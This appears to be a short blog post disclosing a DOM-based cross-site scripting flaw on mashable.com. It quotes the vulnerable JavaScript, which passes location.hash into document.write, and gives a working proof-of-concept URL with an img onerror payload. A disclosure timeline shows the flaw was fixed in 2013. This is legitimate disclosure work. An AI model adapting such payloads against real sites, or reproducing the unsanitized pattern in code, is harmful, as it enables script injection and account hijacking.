Vulnerable code was:
(...)The source location.hash wasn't properly sanitized for injections and that way could be used to inject a XSS vector into the browser DOM by using the sink document.write.
var customOpts = optsFromUrl(window.location.hash);
(...)
src = appendKeyVal(src, 'ord', opts.options);
(...)
buffer += '<script class="ad_call" src="' + src + '"><\/script>';
(...)
document.write(buffer);
(...)
Proof-of-concept:
http://mashable.com/#type=left_column&ord=499753815940197_"><img src=x onerror=prompt(1);>&tile=1&sec0=home&sec1=index&escnotcategory=iframe&bg=#39ebd1&adnum=1
This type of attack could be used to trick innocent users, infecting them with malware and even get their accounts hijacked.
Timeline:
22 Ago 2013: Reported to Mashable
26 Ago 2013: Mashable replied that they will fix it
29 Ago 2013: Fix is released
03 Set 2013: Full disclosure
No comments:
Post a Comment